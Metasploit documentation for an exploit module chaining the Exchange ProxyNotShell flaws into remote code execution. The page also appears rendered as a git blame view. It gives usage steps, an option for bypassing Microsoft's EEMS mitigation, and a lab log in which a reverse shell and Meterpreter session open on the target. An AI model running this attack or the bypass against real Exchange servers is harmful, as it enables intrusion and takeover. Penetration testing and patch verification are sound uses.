documentation/modules/exploit/windows/http/exchange_proxynotshell_rce.md

## Vulnerable Application

This module chains two vulnerabilities on Microsoft Exchange Server that, when combined, allow an authenticated attacker
to interact with the Exchange Powershell backend (CVE-2022-41040), where a deserialization flaw can be leveraged to
obtain code execution (CVE-2022-41082). This exploit only support Exchange Server 2019.

By taking advantage of this vulnerability, you can execute arbitrary commands on the remote Microsoft Exchange Server.

This vulnerability affects:

  * Exchange 2013 CU23 < 15.0.1497.44
  * Exchange 2016 CU22 < 15.1.2375.37
  * Exchange 2016 CU23 < 15.1.2507.16
  * Exchange 2019 CU11 < 15.2.986.36
  * Exchange 2019 CU12 < 15.2.1118.20

*Source: [Description of the security update for Microsoft Exchange Server 2019, 2016, and 2013: November 8, 2022 (KB5019758)][1]*

## Verification Steps

1. Start msfconsole
2. Do: `use exploit/windows/http/exchange_proxynotshell_rce`
3. Do: `set RHOSTS [IP]`
4. Do: `set USERNAME [USERNAME]`
5. Do: `set PASSWORD [PASSWORD]`
6. Do: `run`

## Advanced Options
### EemsBypass

Technique to bypass the EEMS rule.

**none** -- Make no attempt to bypass the EEMS rule. This can be used with the `check` method to determine if the EEMS 
M1 rule is applied.
**IBM037v1** -- Use IBM037 encoding combined with the `X-Up-Devcap-Post-Charset` header and `UP` User-Agent prefix. See
[ProxyNotRelay][2] for more information.

### MaxBackendRetries

The maximum number of times to retry for targeting the backend server with the SSRF. This is useful in environments
where a Data Availability Group (DAG) is in place and causes requests to be sent to a random backend server.

## Scenarios

### Version and OS

```
msf6 exploit(windows/http/exchange_proxynotshell_rce) > set RHOSTS 192.168.159.11
RHOSTS => 192.168.159.11
msf6 exploit(windows/http/exchange_proxynotshell_rce) > set USERNAME aliddle
USERNAME => aliddle
msf6 exploit(windows/http/exchange_proxynotshell_rce) > set PASSWORD Password1!
PASSWORD => Password1!
msf6 exploit(windows/http/exchange_proxynotshell_rce) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending stage (175686 bytes) to 192.168.159.11
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.11:7290) at 2022-11-18 17:32:18 -0500

meterpreter > 
```

[1]: https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-november-8-2022-kb5019758-2b3b039b-68b9-4f35-9064-6b286f495b1d
[2]: https://rw.md/2022/11/09/ProxyNotRelay.html
Add module docs, fix ProxyShell versions 2022-11-18 16:58:53 -05:00			`## Vulnerable Application`

			`This module chains two vulnerabilities on Microsoft Exchange Server that, when combined, allow an authenticated attacker`
			`to interact with the Exchange Powershell backend (CVE-2022-41040), where a deserialization flaw can be leveraged to`
Check that the target is Exchange Server 2019 2022-11-23 10:47:10 -05:00			`obtain code execution (CVE-2022-41082). This exploit only support Exchange Server 2019.`
Add module docs, fix ProxyShell versions 2022-11-18 16:58:53 -05:00
			`By taking advantage of this vulnerability, you can execute arbitrary commands on the remote Microsoft Exchange Server.`

			`This vulnerability affects:`

			`* Exchange 2013 CU23 < 15.0.1497.44`
			`* Exchange 2016 CU22 < 15.1.2375.37`
			`* Exchange 2016 CU23 < 15.1.2507.16`
			`* Exchange 2019 CU11 < 15.2.986.36`
			`* Exchange 2019 CU12 < 15.2.1118.20`

			`Source: [Description of the security update for Microsoft Exchange Server 2019, 2016, and 2013: November 8, 2022 (KB5019758)][1]`

			`## Verification Steps`

			`1. Start msfconsole`
			2. Do: `use exploit/windows/http/exchange_proxynotshell_rce`
			3. Do: `set RHOSTS [IP]`
			4. Do: `set USERNAME [USERNAME]`
			5. Do: `set PASSWORD [PASSWORD]`
			6. Do: `run`

Add the MaxBackendRetries datastore option 2022-11-28 09:45:04 -05:00			`## Advanced Options`
Bypass EEMS M1 2022-11-21 11:13:16 -05:00			`### EemsBypass`

			`Technique to bypass the EEMS rule.`

			none -- Make no attempt to bypass the EEMS rule. This can be used with the `check` method to determine if the EEMS
			`M1 rule is applied.`
			IBM037v1 -- Use IBM037 encoding combined with the `X-Up-Devcap-Post-Charset` header and `UP` User-Agent prefix. See
			`[ProxyNotRelay][2] for more information.`
Add module docs, fix ProxyShell versions 2022-11-18 16:58:53 -05:00
Add the MaxBackendRetries datastore option 2022-11-28 09:45:04 -05:00			`### MaxBackendRetries`

			`The maximum number of times to retry for targeting the backend server with the SSRF. This is useful in environments`
			`where a Data Availability Group (DAG) is in place and causes requests to be sent to a random backend server.`

Add module docs, fix ProxyShell versions 2022-11-18 16:58:53 -05:00			`## Scenarios`

			`### Version and OS`

			```
			`msf6 exploit(windows/http/exchange_proxynotshell_rce) > set RHOSTS 192.168.159.11`
			`RHOSTS => 192.168.159.11`
			`msf6 exploit(windows/http/exchange_proxynotshell_rce) > set USERNAME aliddle`
			`USERNAME => aliddle`
			`msf6 exploit(windows/http/exchange_proxynotshell_rce) > set PASSWORD Password1!`
			`PASSWORD => Password1!`
			`msf6 exploit(windows/http/exchange_proxynotshell_rce) > exploit`

			`[*] Started reverse TCP handler on 192.168.159.128:4444`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[+] The target is vulnerable.`
			`[*] Sending stage (175686 bytes) to 192.168.159.11`
			`[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.11:7290) at 2022-11-18 17:32:18 -0500`

			`meterpreter >`
			```

			`[1]: https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-november-8-2022-kb5019758-2b3b039b-68b9-4f35-9064-6b286f495b1d`
Bypass EEMS M1 2022-11-21 11:13:16 -05:00			`[2]: https://rw.md/2022/11/09/ProxyNotRelay.html`